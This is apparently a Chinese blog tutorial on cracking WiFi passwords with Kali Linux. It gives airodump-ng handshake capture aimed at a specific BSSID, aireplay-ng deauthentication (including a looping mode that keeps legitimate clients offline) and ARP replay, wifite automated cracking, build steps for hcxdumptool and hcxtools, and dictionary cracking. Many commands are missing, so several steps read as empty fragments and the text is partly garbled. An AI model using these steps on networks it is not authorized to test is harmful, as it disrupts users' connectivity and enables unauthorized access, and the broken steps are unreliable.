当前 卡
Current MAC: 1c:bf:ce:b6:42:06 (unknown)
Permanent MAC: 1c:bf:ce:b6:42:06 (unknown)
- 抓握手包
airodump-ng -c 4 –bssid EC:41:18:28:03:40 -w hach wlan0mon
开启监听模式
查看wifi 卡信息
嗅探wifi
攻击
- -0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。
如果一个客户端连在路由端上,但是没有人上 以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a -c wifi0 参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上 )
【-a】:设置 ap 的 mac
【-c】:设置已连接的合法客户端的 mac。
如果不设置-c,则断开所有和 ap 连接的合法客户端。
aireplay-ng -3 -b -h wifi0
aireplay-ng -3 -b EC:41:18:28:03:40 -h EC:41:18:28:03:40 wifi0
冲突模式
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
- fake count
查看wifi设备用
开始嗅探
卡将从 wlan0 ->wlan0mon“`
扫描wifi
抓取握手包 handshake package
i
跑包tcpdump .cap后缀包
踢用户
比如
-是用户的手机mac地址,-a是路由器的mac也就是bssid地址
- 使用wifite
enter wifite scan wifi and clientr> wifite ctrl+c choose number crack, all crack all
wifite默认字典
vim /usr/share/dict/wordlist-probable.txt
冲突问题解决
在虚拟机重新选择 卡, 或者重启kili或者执行
,以及
安装hcxdumptool
下载源码编译(使用root运行,Linux内核版本>=4.14) https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz tarf -xvf 4.2.0.tar.gz cd hcxdumptool-4.2.0 make && make install # 编译完成后的工具均安装在/usr/local/bin/目录下
hcxtools
安装依赖软件包,解决编译 错 apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev #下载源码编译(使用root运行) wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz tar -xvf 4.2.0.tar.gz cd hcxtools-4.2.0 make && make install # 编译完成后的工具均安装在/usr/local/bin/目录下。
除了使用下载方法进行编译外还可以使用进行修改 源编译.
首先复制下面文本
输入命令
到或者
参考链接:https://blog.csdn.net/xsgjm/article/details/105847524
wifi crack hcxdumptool下载地址
https://github.com/ZerBea/hcxdumptool
跑字典
攻击wifi设备的标准步骤
Step 1:
输入后你讲看到这2个列,Station列代表的是mac地址,没有的话,要么抓不到,要么是每用户连接
Station: Frames ,
Step 2:
STATION_MAC_ADDRESS IS YOU PHONE OR OTHER CLIENT MAC ADDRESSS
kali系统更新
upgrade all soft
version info
update all system
跑包其它方法
EWSA 5.1.271破包工具 WIFIPR 中文汉化免安装
抓包和基本字典测试.
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!